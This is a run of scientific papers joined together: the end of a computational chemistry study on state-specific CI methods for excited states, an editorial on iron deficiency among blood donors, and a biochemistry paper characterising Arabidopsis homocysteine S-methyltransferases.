gap, 99 we observe that EOM-CC methods considerably overestimate it (0.94 eV in CC2 and 0.65 eV in CCSD), whereas the statespecific methods deliver improved results (0.65 eV in ΔCSF and 0.39 eV in ΔCISD).
Another challenging system is glyoxal, which presents excited states of genuine multireference character. 115 While the first pair of NTOs has a dominant weight, the second pair is nonnegligible. In this sense, most of the first excited states of glyoxal lie between the cases of most singly excited states (that can be qualitatively described with one CSF) and those that need two CSFs. Being an intermediate case, here we performed ΔCISD calculations with references containing one or two CSFs, for the first two singlet states and the first four triplet states (results presented in Table 7). With one CSF only, ΔCSF typically overestimates the reference excitation energies, with the corresponding ΔCISD improving the overall comparison. For this set of six excited states, the associated MAEs are 1.14 eV for ΔCSF and 0.65 eV for ΔCISD when using a single CSF as the reference. Despite the improvement at the CISD level, this is still limited by the lack of an actual multiconfigurational reference for The reference method is CCSDTQ. 100 Only the lowest-lying optically bright (1 1 B u ) and dark (2 1 A g ) states and their energy gaps are compared here. Seven more states have been computed, which can also be found in the Supporting Information. b Intruder state problem for this state. these states. When two CSFs are employed as the reference for the excited states, the MAEs are reduced to 0.58 eV (ΔCSF) and 0.22 eV (ΔCISD), which can be further decreased to 0.08 eV with ΔCISD+PC. We thus recommend augmenting the excitedstate reference whenever it displays at least some multireference character, and the weight of the first pairs of NTOs could serve as an easy proxy for this. Finally, we comment on the lowest-lying 1 1 Δ g and higherlying 2 1 Σ g + doubly excited states of C 2 and C 3 , which would require at least CCSDTQ quality calculations to become accurate to within 0.1 eV. 25 C 2 displays a strong multireference ground state, and thus we employed two CSFs as the reference: the closed-shell HF and the determinant associated with the (σ 2s *) 2 → (σ 2pd z ) 2 transition. For its doubly excited states, we employed the two CSFs needed to describe both doubly excited states generated from the HF determinant through the (π 2pd x ) 2 → (σ 2pd z ) 2 and (π 2pd y ) 2 → (σ 2pd z ) 2 excitations, with π 2pd x and π 2pd y being degenerate orbitals. In C 3 , the multireference character of the ground state is weaker, and thus we adopted a single HF determinant as a reference. In turn, four CSFs are needed for its doubly excited states, built from the HF determinant by performing (σ g ) 2 → (π 2pd x * ) 2 , (σ g ) 2 → (π 2pd y * ) 2 , (σ u ) 2 → (π 2pd x * ) 2 , and (σ u ) 2 → (π 2pd y * ) 2 transitions, where π 2pd x * and π 2pd y * are degenerate orbitals. We therefore reassign the doubly excited states of C 3 as (σ) 2 → (π*) 2 , which had been first assigned as (π) 2 → (σ*) 2 . 25 Notice that, for both systems, what differentiates 1 1 Δ g and 2 1 Σ g + is essentially the phase between the two CSFs differing by the occupation of the degenerate orbitals (π in C 2 , π* in C 3 ). Thus, the higher-lying state orbitals were obtained by optimizing for the second CI root associated with the reference (two CSFs in C 2 , four in C 3 ). The computed excitation energies of C 2 and C 3 are shown in Tables 8 and 9, respectively. We found that ΔCISD is more accurate than CCSDT for C 2 and even more accurate than CCSDTQ for C 3 .
V. CONCLUSIONS
Here we have presented and benchmarked a particular statespecific realization of MCSCF and MRCI as a route to perform excited-state calculations. The orbitals are optimized for a targeted state with a minimal set of CSFs, serving as the reference wave function for the CI calculations, which can be further corrected with Epstein-Nesbet perturbation theory or with a posteriori Davidson corrections. We surveyed these methods against more established alternatives by computing excitation energies for a vast class of molecules and types of excitations from the QUEST database. State-specific CI was found to be substantially more accurate than the standard CI methods based on a ground-state reference. Importantly, it delivers reliable results across different types of excited states, most notably when comparing singly and doubly excited states, and can easily handle ground and excited states of a multireference nature. The overall accuracy of ΔCISD rivals that of CC2 (MAEs of 0.17 to 0.18 eV), whereas ΔCISD+EN2 is comparable to CCSD (MAEs of 0.08 eV), with ΔCISD+Q lying in between (MAE of 0.10 to 0.12 eV). For larger systems, ΔCISD+Q leads to more accurate results (MAE of 0.07 to 0.09 eV) than CC2 and CCSD (MAEs of 0.10 to 0.12 eV).
There are many exciting possibilities to be pursued from this work. One is to develop analogous state-specific coupled-cluster methods. In light of the huge improvement we have observed when going from ground-state-based to state-specific CI, we expect a similar gain when comparing EOM-CC to state-specific CC methods where tailored CSFs are employed as the reference wave function. 116−118 One could also develop state-specific implementations of seniority-based 92 and hierarchy-based 93 CI for excited states. It would be important to assess the performance of our state-specific approaches to charge-transfer states and even larger systems, which would require switching from a determinant-driven to an integral-driven implementation. In addition, it remains to be seen how the methods presented here behave out of the equilibrium geometry, particularly in strong correlation regimes. Although evaluating nonorthogonal matrix elements is more challenging than their orthogonal analogs, the calculation of static properties such as dipole moments and oscillator strengths is possible thanks to the recent generalized extension of the nonorthogonal Wick's theorem proposed by Burton. 119,120 Yet another exciting possibility is to move from a state-specific to a state-averaged reference while contemplating only a small set of important determinants for describing a given set of states. We recall that the very compact reference wave function employed here is what currently limits the ΔCI method to relatively low-lying excited states. For instance, missing important determinants in the reference space give rise to intruder states encountered in some of the ΔCISD+EN2 calculations. In particular, including the Aufbau closed-shell determinant in the reference should improve the case of fully symmetric excited states. More generally, when two states of the same symmetry are strongly coupled, a larger reference should be considered as well. These issues are expected to become more prominent at higher energies, due to an increasing number of excited states. Developments toward more suitable reference wave functions could enable the ΔCI method to target higher-lying excited states.
Additional statistical measures for different sets of excited states and for all flavors of ΔCISD+Q models (PDF) For the full set of 294 excited states, total energies and excitation energies obtained for ΔCSF, ΔCISD, ΔCISD +EN2 and 7 variants of ΔCISD+Q models; excitation energies computed with CIS, CIS(D), CC2, and CCSD; number of determinants in the reference, saddle point order associated with the ΔCSF solutions; the reference excitation energies and corresponding method; and additional statistical measures; for a subset of 16 excited states, total energies and excitation energies obtained at the ΔCISDT, ΔCISDTQ, and ground-state-based CISDT and CISDTQ levels of theory; for the subset of 10 doubly excited states, excitation energies obtained at the CC3, CCSDT, CC4, and CCSDTQ levels of theory (XLSX) ■ REFERENCES | 2022-11-08T06:42:53.814Z | 2022-11-06T00:00:00.000 | {
"year": 2023,
"sha1": "ae9639859b326f6c76685fceee40acfb3ab7a596",
"oa_license": "CCBYNCND",
"oa_url": "https://pubs.acs.org/doi/pdf/10.1021/acs.jctc.3c00057",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "3f97e8eda3b70426bd8cb2a5331c92e3fdd84234",
"s2fieldsofstudy": [
"Chemistry"
],
"extfieldsofstudy": [
"Medicine",
"Physics"
]
} |
19731154 | pes2o/s2orc | v3-fos-license | Blood donation, blood supply, iron deficiency and anemia - it is time to shift attention back to donor health
Since the 1980s blood collectors worldwide have focused on two central themes: blood product safety and an adequate blood supply. From the standpoint of safety, specifically the reduction of transfusion-transmitted diseases, the achievements over the past quarter century are remarkable. With respect to the adequacy of the blood supply, the past decade has witnessed major gains in some countries of Europe, Canada and the US and less than had been expected in others, including Brazil, where the challenge of having a more stable blood supply, in which supply and demand are in better balance remains an important issue(1).
On the other hand, the aforementioned achievement has come at a price: iron depletion of the repeat blood donor. Blood centers have long recognized that it is more effective and less expensive to collect blood from existing donors than to recruit new donors. While first-time donors, particularly the young and minorities, have been more successfully recruited, 70% of US and 40-70% (depending on the region) of Brazilian donors are repeat donors(1,2).
The only known significant disadvantage of blood donation is the potential risk of iron deficiency (ID). Iron is a vitally important element in the human metabolism. It plays a central role in erythropoiesis and is also involved in many other intracellular processes in all the tissues of the body. The potentiality of the individual donor to give blood without developing ID and iron deficiency anemia (IDA) varies widely, probably due to differences in nutritional iron intake, the differences in prevalences of ID in each study population, menstrual iron loss in females, the frequency of blood donation and the use of supplemental iron(2).
The frequency of ID is high in blood donors (1.8% to 8.4% in males and 4.5% to 34.8% in females), and more dependent on the frequency of donations than on the cumulated number of donations(2,4). In addition to this, ID is a significant problem and its prevalence is increasing in many countries around the world. The prevalence has been reported to be 9-40% in women, depending on age and menstrual status and 2-5% in men(1,2). Because menstruating females begin their blood donation careers from a lower starting point, subsequent donations pose a risk for greater clinical harm. Females have much higher rates of both ID and IDA.The clinical implications of ID and IDA are not insignificant, including fatigue, reduced work performance and intellectual capacity, reduced endurance, restless leg syndrome, pica, and cognitive and immune function changes. The degree of symptomatology is proportionate to the severity of the anemia(1,2).
Moreover, low hemoglobin (Hb) accounts for 4-10% of total deferrals, with the vast majority occurring in women. Therefore it seems reasonable to secure adequate iron reserves in the donor population in order to maintain an appropriate donation potentiality and to avoid possible hematological and non-hematological complications related to ID(1,2).
The question that arises is whether this practice is in the best interest of donor health. In this issue of Revista Brasileira de Hematologia e Hemoterapia, Silva et al., representing the Hemocentro Regional de Uberaba, Minas Gerais, Brazil, have brought this issue to light(5).
Given the findings in this and other studies, what measures can blood collectors pursue to address iron depletion? There is no single answer, but several approaches should be considered: 1) modifying the donor Hb requirements and measurement of Hb, 2) changing the interdonation interval, 3) testing for serum ferritin, and 4) iron supplementation.
Modifying donor Hb requirements and measurement of Hb
The current minimum Hb requirement in the Brazilian guidelines as well as in the European Union guidelines is 12.5 g/dL for females and 13.0 g/dL for males; these values seem to be reasonable (6,7) . However, we know that IDA is the last stage of ID and it is evident that Hb measurement, alone, is inadequate to detect blood donors with ID but without anemia. It is not surprising that the current practice results in accepting many iron-depleted female donors who have normal Hb values (2) . Regarding
Changing the interdonation interval
With respect to the interdonation interval and iron status, the number of donations over the previous 2 years was the most significant indicator of ID and IDA in the RISE study (8) . For females, there were no significant differences in deferral rates if 15 weeks had elapsed since the last donation, but there were highly significant differences between weeks 8 and 14. On the other hand, there was an insufficient number of males for evaluation. It is noteworthy that over time with successive donations the Hb decreased as well, such that the proportion of female donors with values below 12.5 g/dL, increased from 11% to 25%, while the men has a trend toward significance, with an increase from 1% to 5%. These findings highlight the point that the current standard of 8 weeks is insufficient to replenish iron stores (8) .
Thus, one option to mitigate the effects of blood donation on ID would be to increase the interdonation interval for donors of whole blood from the current eight weeks to at least 12 weeks. Such a change would have an impact on blood donor scheduling, but it is worth mentioning that several European countries, that recognized the anemia problem, limit annual whole blood donations (four and three for males and females, respectively) as well as to adopt the minimum interdonation interval of 12 weeks for whole blood (1,8) .
Testing for serum ferritin
Assessing serum ferritin (SF) levels would be the most accurate way to assess "iron health". However, testing for SF poses significant challenges. Besides being a moderately expensive test, collecting additional samples, determining the frequency of testing and handling donor counseling would need to be solved. Another drawback is that results are not readily available to make a decision on site (9) .
Iron supplementation
Every blood donation (450 ± 25 mL) is associated with significant iron loss, approximately 200 to 230 mg and the lost iron is not readily replenished. Even with iron-rich diets and excellent compliance, six months or longer are necessary to positively impact SF levels. Therefore, this practice is inadequate in the scenario of blood donation (2,9) .
Recent studies in blood donors have shown that short-term (4-to 8-week course) use of oral iron supplementation at 100-300 mg daily of elemental iron (and even utilizing lower doses such as 20-40 mg/day), is effective in improving Hb levels, in replacing iron loss after blood donation even in menstruating females, in maintaining SF concentrations in a range of 50 to 80 µg/L and significantly reducing blood donation deferral. Thus, low-dose iron administered (100 mg/day) for up to 60 days post-donation appears to be a sound and feasible strategy (10)(11)(12) .
Conclusions and recommendations
The fact that blood donation results in iron depletion is old news to the transfusion medicine community and many recent studies stress how serious and prevalent ID is among blood donors. With greater appreciation of the clinical consequences of ID, both physical and intellectual, this issue must move to center stage and the transfusion medicine community has an obligation to address this matter.
While there is no question that the donor pool needs to be more robust to meet both current and future demand, concerns about the blood supply must take into consideration the donor health.
It is time to discuss more profoundly possible approaches to address iron depletion in blood donors. It is time to shift attention back to donor health, which is indeed no less important than insuring a safe blood supply. | 2017-06-29T03:27:37.125Z | 2012-01-01T00:00:00.000 | {
"year": 2012,
"sha1": "69c0fd01a3b6af4e868ee172cb31c00d3b3b30de",
"oa_license": "CCBYNC",
"oa_url": "https://europepmc.org/articles/pmc3486820?pdf=render",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "69c0fd01a3b6af4e868ee172cb31c00d3b3b30de",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
31545213 | pes2o/s2orc | v3-fos-license | Characterization and Functional Expression of cDNAs Encoding Methionine-sensitive and -insensitive Homocysteine S-Methyltransferases from Arabidopsis *
Plants synthesize S-methylmethionine (SMM) from S-adenosylmethionine (AdoMet), and methionine (Met) by a unique reaction and, like other organisms, use SMM as a methyl donor for Met synthesis from homocysteine (Hcy). These reactions comprise the SMM cycle. Two Arabidopsis cDNAs specifying enzymes that mediate the SMM → Met reaction (SMM:HcyS-methyltransferase, HMT) were identified by homology and authenticated by complementing an Escherichia coli yagDmutant and by detecting HMT activity in complemented cells. Gel blot analyses indicate that these enzymes, AtHMT-1 and -2, are encoded by single copy genes. The deduced polypeptides are similar in size (36 kDa), share a zinc-binding motif, lack obvious targeting sequences, and are 55% identical to each other. The recombinant enzymes exist as monomers. AtHMT-1 and -2 both utilize l-SMM or (S,S)-AdoMet as a methyl donor in vitro and have higher affinities for SMM. Both enzymes also use either methyl donor in vivo because both restore the ability to utilize AdoMet or SMM to a yeast HMT mutant. However, AtHMT-1 is strongly inhibited by Met, whereas AtHMT-2 is not, a difference that could be crucial to the control of flux through the HMT reaction and the SMM cycle. Plant HMT is known to transfer the pro-R methyl group of SMM. This enabled us to use recombinant AtHMT-1 to establish that the other enzyme of the SMM cycle, AdoMet:MetS-methyltransferase, introduces the pro-Smethyl group. These opposing stereoselectivities suggest a way to measure in vivo flux through the SMM cycle.
a reaction mediated by AdoMet:Met S-methyltransferase (MMT, EC 2.1.1.12) (1)(2)(3). SMM can then serve as a methyl donor for the synthesis of Met from homocysteine (Hcy) catalyzed by Hcy S-methyltransferase (HMT, EC 2.1.1.10). The tandem action of MMT and HMT, plus that of S-adenosylhomocysteine (AdoHcy) hydrolase, constitutes the SMM cycle ( Fig. 1). Although MMT and the SMM cycle are unique to plants, HMT occurs in bacteria, yeast, and mammals, enabling them to catabolize SMM of plant origin and providing an alternative to the methionine synthase reaction as a means to methylate Hcy (4 -7).
In wheat and other plants, SMM is synthesized in leaves and transported via the phloem to developing seeds where it can be used to methylate Hcy (8). SMM is also synthesized by morning glory flower buds and then used to methylate Hcy during blooming (9). The halves of the SMM cycle can thus sometimes be separated in space or time. However, both halves may also operate concurrently in the same tissue, and in these cases the cycle has been hypothesized to remove excess AdoMet (3). Testing this hypothetical homeostatic role, which is analogous to that of the cyclic methylation/demethylation of Gly in mammalian liver (10), requires determination of flux through the SMM cycle in defined tissues in vivo. Methods to do this are lacking.
The first enzyme of the SMM cycle, MMT, has been purified from Wollastonia biflora and barley, and characterized (2,11). MMT cDNAs have been isolated from W. biflora, Arabidopsis, and maize, and the two latter plants have been shown to have one MMT gene (8). Much less is known about plant HMTs, and none has been cloned from plants or other eukaryotes. HMT was partially purified from jack beans and germinating peas (12,13) and shown to be stereoselective for one of the two methyl groups of SMM (the pro-R methyl) (14). The preparations obtained used either SMM or AdoMet as methyl donor; it was not established whether both activities reside on the same protein. These data appear to indicate that plants can bypass SMM by recycling AdoMet methyl groups directly to Met (Fig. 1, dotted arrows). However, the AdoMet substrates used in these experiments most probably contained significant levels of the nonphysiological R,S diastereomer (15), and it has been suggested that this, not the physiological S,S form, is the substrate for HMTs (7). The form of AdoMet that plant HMTs utilize is therefore unclear. Neither jack bean nor pea HMT was strongly inhibited by Met (Յ25% inhibition by 10 mM Met; Refs. 12 and 13), which contrasts with the Met sensitivity of the yeast enzyme (12).
Recently, the Escherichia coli YagD protein was shown to be an HMT, and a similar enzyme, selenocysteine Se-methyltransferase (SeCysMT), was characterized and cloned from the selenium-accumulating plant Astragalus bisulcatus (7,16,17). These enzymes share significant primary sequence homology (7) and have a GGCC motif near the C terminus. The cysteine residues in this motif have been implicated in zinc binding in two other enzymes that catalyze methyl transfers to Hcy, E. coli B 12 -dependent Met synthase and mammalian betaine-Hcy methyltransferase (18,19). The enzyme-bound zinc is required to activate the thiol group of Hcy for nucleophilic attack (18).
In this work, we identified two Arabidopsis homologs of YagD and confirmed that they encode HMTs. The recombinant enzymes were partially characterized, with emphasis on clarifying their substrate specificity and sensitivity to Met. We also surveyed the genomic complexity of HMT genes in Arabidopsis and used the known stereoselectivity of HMT to establish that of the other enzyme of the SMM cycle, MMT. The results of the stereospecificity study suggest a novel approach to determining flux through the SMM cycle in vivo.
Separation of AdoMet Diastereomers-The S,S (biologically active) and R,S (inactive) diastereomers of AdoMet were separated by HPLC essentially as described by Beaudouin et al. (22). Analytical scale separations of [methyl-14 C]AdoMet and unlabeled AdoMet were made on a 1 ϫ 150 mm Reliasil C18 column using a microbore HPLC system (UMA model, Michrom Bioresources, Auburn, CA). Solvent A was water containing 0.1 M sodium acetate, 20 mM citric acid, 0.93 mM octanesulfonic acid, and 0.12 mM EDTA; solvent B was methanol, and the gradient was from 100 -95% solvent A in 45 min. The elution profile was monitored at 258 nm. The [methyl-14 C]AdoMet contained no detectable R,S form (1% or less) and was used without further purification. As previously reported (15), unlabeled AdoMet was found to contain Ϸ15% of the R,S isomer. In the few cases (see "Results") in which unlabeled AdoMet was included in enzyme assays, specific radioactivity calculations were based on its (S,S)-AdoMet content.
cDNA Generation, Sequencing, and Sequence Analysis-Arabidopsis expressed sequence tags, GenBank TM accession numbers T46013 and H37463 (encoding AtHMT-1 and -2, respectively), were obtained from the Arabidopsis Biological Resource Center (Columbus, OH). The Ϸ750base pair insert in H37463, which is truncated at the 5Ј-end, was used to isolate a full-length cDNA from an Arabidopsis (ecotype Landsberg erecta) leaf library in the Uni-Zap XR vector (Stratagene) (provided by T. L. Thomas, Texas A&M University). DNA sequencing procedures were as described (8). Sequence alignments were made using Clustal W 1.7 (27); phylogenetic analysis was carried out using the Darwin system at the ETH server. Homology searches were made using BLAST programs (28).
cDNA Expression in E. coli-HMT coding sequences were amplified from plasmid templates by high fidelity polymerase chain reaction using recombinant Pfu DNA polymerase (Stratagene). The primers included the first or last 6 -7 codons plus restriction sites for cloning into pBluescript SK-and, for the forward primers, a Shine-Delgarno sequence preceded by a stop codon in frame with the LacZ protein encoded by the vector. The AtHMT-1 primers were 5Ј-CGGAATTCTT-GAAGGAAACAGCTATGGTTTTGGAGAAAAAATC-3Ј (forward) and 5Ј-CCCAAGCTTTCATCTTCGTTTCAAATCTC-3Ј (reverse); the AtHMT-2 primers were 5Ј-AAAACTGCAGGTGAAGGAAACAGCTAT-GACCGGAAACTCTTTTAAC-3Ј (forward) and 5Ј-CGGGGTACCCTAA-AGAGATCTGCGGTTGAC-3Ј (reverse). After ligation into pBluescript, constructs were introduced into E. coli strain DH10B by electroporation. Plasmid preparations were sequenced to verify the inserts and used to transform E. coli strain MTD123 by electroporation.
Enzyme Isolation and Molecular Mass Determination-E. coli cultures (50 ml) were grown to an A 600 of 0.6 -1 in LB medium (24) containing 100 g ml Ϫ1 ampicillin and 1 mM isopropyl-1-thio--D-galactopyranoside. Cells were harvested by centrifugation (4000 ϫ g, 10 min, 4°C), washed in buffer A (100 mM Hepes-KOH, pH 7.5, 1 mM DTT, 10% glycerol), recentrifuged, frozen in liquid N 2 , and stored until extraction at Ϫ80°C. Subsequent operations were at 0 -10°C. Cells were resuspended in buffer A (5 ml/50-ml culture) and broken by sonication; the extract was cleared by centrifugation (10,000 ϫ g, 15 min) and used for enzyme assays directly or after desalting on PD-10 columns (Amersham Pharmacia Biotech) equilibrated in buffer A. Extracts were routinely stored at Ϫ80°C after freezing in liquid N 2 ; this was shown not to affect HMT activity. Yeast extracts were prepared as described previously (26) using buffer A. Native molecular masses were estimated using a Waters 626 HPLC system equipped with a Superdex 200 HR 10/30 column (Amersham Pharmacia Biotech); reference proteins were cytochrome c, carbonic anhydrase, bovine serum albumin, and -amylase. Protein was estimated by Bradford's method (29) using bovine serum albumin as standard.
Enzyme Assays-Unless otherwise indicated, assays were made under conditions in which substrates were saturating and product formation was proportional to enzyme level and time. The assays were modifications of that described by Mudd Electrospray Mass Spectrometry-The [ 13 C]Met formed by the sequential action of MMT and HMT was analyzed on a FinniganMAT LQC (Thermoquest, San Jose, CA) mass spectrometer system. The source voltage was set at 3.5 kV and capillary voltage at 30 V; the capillary temperature was 22°C. Background source pressure was Ϸ1.5 ϫ 10 Ϫ5 torr as read by an ion gauge. The sample flow rate was 10 l min Ϫ1 . The drying gas was N 2 . The LQC was scanned to 2000 atomic mass units. Spectra were acquired for 0.5 min. Samples were dissolved in 50 l of water; 25 l was injected into the mass spectrometer.
DNA Gel Blot Analyses-Arabidopsis genomic DNA was isolated from leaves as described (30). Five-g samples of the isolated DNA were digested, separated in 0.7% agarose gels, and transferred to supported nitrocellulose membrane (Nitropure, MSI) as described (24). Blots were hybridized overnight at 58°C in 5ϫ SSC, 5ϫ Denhardt's solution, 1% SDS, 1 mM EDTA, and 100 g ml Ϫ1 sonicated salmon sperm DNA and washed at low stringency (1ϫ SSC, 0.1% SDS, 37°C). The probes were the full-length AtHMT-1 or -2 cDNAs and were labeled with 32 P by the random primer method. Radioactive bands were detected by autoradiography.
RESULTS
Genomic-based Cloning of HMT cDNAs from Arabidopsis-BLAST searches using the amino acid sequence of E. coli YagD detected two sets of homologous Arabidopsis expressed sequence tags. Sequencing one insert from each set (GenBank TM accession numbers T46013 and H37463) established that they represent two distinct transcripts. The T46013 insert encodes a 326-residue (36.0 kDa) polypeptide, designated AtHMT-1. The H37463 insert encodes only the C-terminal part of a polypep-tide and so was used to isolate the corresponding full-length cDNA from an Arabidopsis leaf library. This cDNA specifies a 333-residue (36.4 kDa) polypeptide, designated AtHMT-2. The deduced AtHMT-1 and -2 proteins are 55% identical to each other, 50 (AtHMT-1) or 68% (AtHMT-2) identical to Astragalus SeCysMT, and 24 -41% identical to YagD and two yeast proteins, Ypl273w and Yll062c, that were shown to be HMTs while our work was in progress (Fig. 2). 2 AtHMT-1 and -2 also share significant sequence identity (20 -26%) with the N-terminal region of E. coli B 12 -dependent Met synthase and with mammalian betaine-Hcy methyltransferase (not shown). AtHMT-1 and -2 both have a GGCC zinc-binding motif near the C terminus, as well as a third conserved cysteine sited 65 residues upstream that may also be a zinc ligand (18,19). Both AtHMT-1 and -2 appear to lack targeting sequences (e.g. chloroplast or mitochondrial transit peptides), indicating that they are cytosolic enzymes.
Complementation of an E. coli yagD Mutant and Detection of HMT Activity-The coding regions of AtHMT-1 and -2 were subcloned into pBluescript SK-. To express the HMTs as native proteins and not LacZ fusions, the coding sequences were preceded by a stop codon in frame with LacZ and a Shine-Delgarno sequence. These constructs were introduced into E. coli strain MTD123 (⌬yagD ⌬metE ⌬metH), which lacks Met synthase and HMT activity, and is consequently a Met auxotroph that cannot grow on SMM (16). Both constructs enabled transformants to grow on SMM (Fig. 3A); no transformants grew on medium without SMM, indicating complementation of the yagD mutation and not the metE or metH mutations (not shown). No complementation was observed with the vector alone (Fig. 3A), and retransforming MTD123 with rescued plasmids containing the AtHMT-1 or -2 cDNAs restored the ability to grow on SMM, showing that the complementation is because of the encoded plant protein. HMT activity was readily detected in extracts of the complemented strains but not, as expected, in cells transformed with the vector alone (Fig. 3B). The specific activity of AtHMT-1 was Ϸ10-fold higher than that of AtHMT-2; this difference was observed consistently in independent experiments. To authenticate the observed activities, the [ 35 S]Met reaction products were verified by TLC (Fig. 3C).
Methyl Acceptor Specificity of AtHMT-1 and -2-We compared the ability of AtHMT-1 and -2 to catalyze methyl transfer from L-SMM to various thiols and related compounds, using L-Hcy as the benchmark (Table I). Both enzymes utilized D-Hcy, although AtHMT-1 showed a marked preference for the L form. A similar lack of stereospecificity toward Hcy has been noted for other HMTs (7, 31). AtHMT-1 showed significant activity with L-and D-cysteine, which is noteworthy as cysteine is not a substrate for E. coli or yeast HMTs (7,31). Neither enzyme attacked DL-selenocysteine (Table I), glutathione, coenzyme A, sulfide, or thiocyanate (not shown).
Methyl Donor Specificity of AtHMT-1 and -2-SMM occurs in plants as the L enantiomer (8) and AtHMT-1 and -2 both proved to be specific for this form: with 20 M D-or L-[1-14 C]SMM and 2 mM L-Hcy as substrates, activities with D-SMM were undetectable (Ͻ3% of those with L-SMM). To compare L-SMM and (S,S)-AdoMet as methyl donors, Michaelis constants and relative V max values were determined for both enzymes (Table II). (S,S)-AdoMet was found to be a methyl donor for both enzymes, but the K m values were higher than for L-SMM (67-fold for AtHMT-1 and 4.5-fold for AtHMT-2) and the V max values were lower. The (S,S)-[methyl-14 C]AdoMet used in these experiments contained no detectable (Յ1%) R,S diastereomer and, in the assay conditions used (pH 7.5, 30 min), Յ0.3% (R,S)-AdoMet is expected to form by racemization (15). (R,S)-AdoMet therefore did not contribute significantly to the observed activities. Because SMM and (S,S)-AdoMet are substrates, K m values for L-Hcy were determined with both (Table II); fairly similar values were obtained with both methyl donors and with both enzymes. To screen for other potential methyl donors, unlabeled compounds were tested for their ability to inhibit methyl transfer from [ 35 S]SMM when added to assays in 5-fold molar excess. Glycine betaine, choline, phosphocholine, DMSP, and 5-methyltetrahydrofolate had little effect on either enzyme (Յ13% inhibition; data not shown), making it unlikely that they are significant methyl donors.
Met Sensitivity and Other Biochemical Properties of AtHMT-1 and -2-With either L-SMM or (S,S)-AdoMet as a methyl donor, AtHMT-1 activity showed strong product inhibition by L-Met, whereas AtHMT-2 did not, being almost unaffected by L-Met concentrations in the physiological range (Յ500 M) (Fig. 4). AtHMT-1 and -2 both showed maximal activity at pH 7.5. Neither was stimulated by Zn 2ϩ (0.1 or 1 mM). AtHMT-1 activity was modestly inhibited by 1 mM EDTA (26%); AtHMT-2 activity was not. The molecular masses of the native AtHMT-1 and -2 enzymes were estimated by size exclusion chromatography to be 36 kDa. This indicates that both enzymes exist as monomers, as do other HMTs and SecysMT (7,17,31).
Complementation of Yeast HMT Mutations-Yeast cells take up SMM and AdoMet and metabolize them to Met via the action of HMT (5,6). Disruption of the open reading frames yll062c (MHT1) and ypl273w (SAM4) (Fig. 2) has demonstrated that they specify HMTs that prefer SMM and AdoMet, respectively. 2 A triple disruptant (CY61-1D) lacking Met synthase as well as both HMTs is consequently a Met auxotroph that cannot use SMM or AdoMet in place of Met. To confirm that AdoMet and SMM serve as methyl donors for AtHMT-1 and -2 in vivo, each was expressed in CY61-1D and the transformants were tested for the ability to grow on SMM or AdoMet (Fig. 5) (this type of experiment cannot be carried out in E. coli because it cannot absorb AdoMet). AtHMT-1 and -2 enabled growth on either compound establishing that SMM and AdoMet are indeed substrates for both enzymes in vivo as well as in vitro. To exclude the possibility that the differing Met sensitivities shown in Fig. 4 are an artifact of expression in E. coli, SMM: Hcy S-methyltransferase activity was assayed in desalted extracts of yeast transformants expressing AtHMT-1 and -2. As with the recombinant enzymes from E. coli, AtHMT-1 was inhibited strongly by L-Met (92% at 500 M L-Met), whereas AtHMT-2 was not. Activities without L-Met were 1.9 and 1.8 nmol min Ϫ1 mg Ϫ1 protein for AtHMT-1 and -2, respectively; these nearly equal values contrast with the Ϸ10-fold difference seen when these enzymes are expressed in E. coli (Fig. 3B). These data suggest that AtHMT-2 may be less stable (or synthesized more slowly) than AtHMT-1 in the bacterial host.
Diastereospecificity of Methyl Transfer in the SMM Cycle-Because HMT is known to transfer the pro-R methyl group of SMM to Hcy (14), we used recombinant AtHMT-1 to determine the diastereospecificity of MMT, the other enzyme of the SMM cycle. To do this, L-[U-13 C 5 ]Met and unlabeled AdoMet were used as substrates for recombinant Arabidopsis MMT; the SMM formed in this reaction was then incubated with unlabeled L-Hcy and AtHMT-1. The resulting 13 C-labeled Met was analyzed by electrospray MS, together with a 1:1 mixture of unlabeled Met and L-[U-13 C 5 ]Met for comparison (Fig. 6). The product of the MMT/HMT reactions gave peaks of almost equal intensity at m/z 151 and 154, corresponding to [ 13 C 1 ]Met and [ 13 C 4 ]Met, and no appreciable signal above that expected for natural abundance 13 C, 15 (18,19). The asterisk marks a third conserved cysteine residue. AtHMT-1 and -2, Arabidopsis HMT-1 and -2; YagD, E. coli YagD (BAA12002); Yll062c, S. cerevisiae Yll062c (S50958); Ypl273w, S. cerevisiae Ypl273w (S65306); SecysMT, A. bisulcatus selenocysteine Se-methyltransferase (CAA10368). 12 C in the original [ 13 C 5 ]Met substrate (Fig. 6B). These data show that MMT introduces a methyl group into the pro-S position of SMM, i.e. that MMT and HMT have opposite stereoselectivities.
Genomic Complexity and Relationships of HMT Genes in Arabidopsis-Southern blot analyses carried out at low stringency indicated that both AtHMT-1 and AtHMT-2 are encoded by single genes (Fig. 7, A and B). Consistent with this result, BLAST searches of the Arabidopsis genome (Ϸ84% complete at the time of searching) revealed a chromosome III sequence specifying AtHMT-1 (AB023041, nucleotides 21893-23610) but no other closely related sequences. Molecular phylogenic analysis (Fig. 7C) of the sequences aligned in Fig. 2 suggests (a) that AtHMT-2 and Astragalus SecysMT belong on a branch distinct from AtHMT-1, and (b) that extant HMTs are derived from a single ancestral gene that existed prior to the divergence of eubacteria and eukaryotes and has undergone independent duplications in plant and yeast lineages. (1), the met6 ypl273 yll062 mutant CY61-1D (2), and CY61-1D transformed with pVT102-L containing AtHMT-1 (3) or AtHMT-2 (4), or alone (5) were plated on minimal medium containing 0.1 mM Met, L-SMM, or AdoMet. The AdoMet used was not purified to remove the R,S diastereomer, because in the conditions used, this forms continuously in the medium from racemization of (S,S)-AdoMet (15).
DISCUSSION
The identification of cDNAs encoding plant HMTs completes the set of genes required for operation of the SMM cycle, the others being MMT and AdoHcy hydrolase (3). This opens the way to comprehensive studies of the expression of these genes and to the systematic application of reverse genetics to probe the function of SMM and its cycle. Furthermore, extracts of E. coli expressing AtHMT-1 or -2 have specific activities Ն10 2fold higher than those of the best plant sources (12, 13) making them good material for future enzyme purification. More generally, the HMT cDNAs reported here appear to be the first identified from a eukaryote.
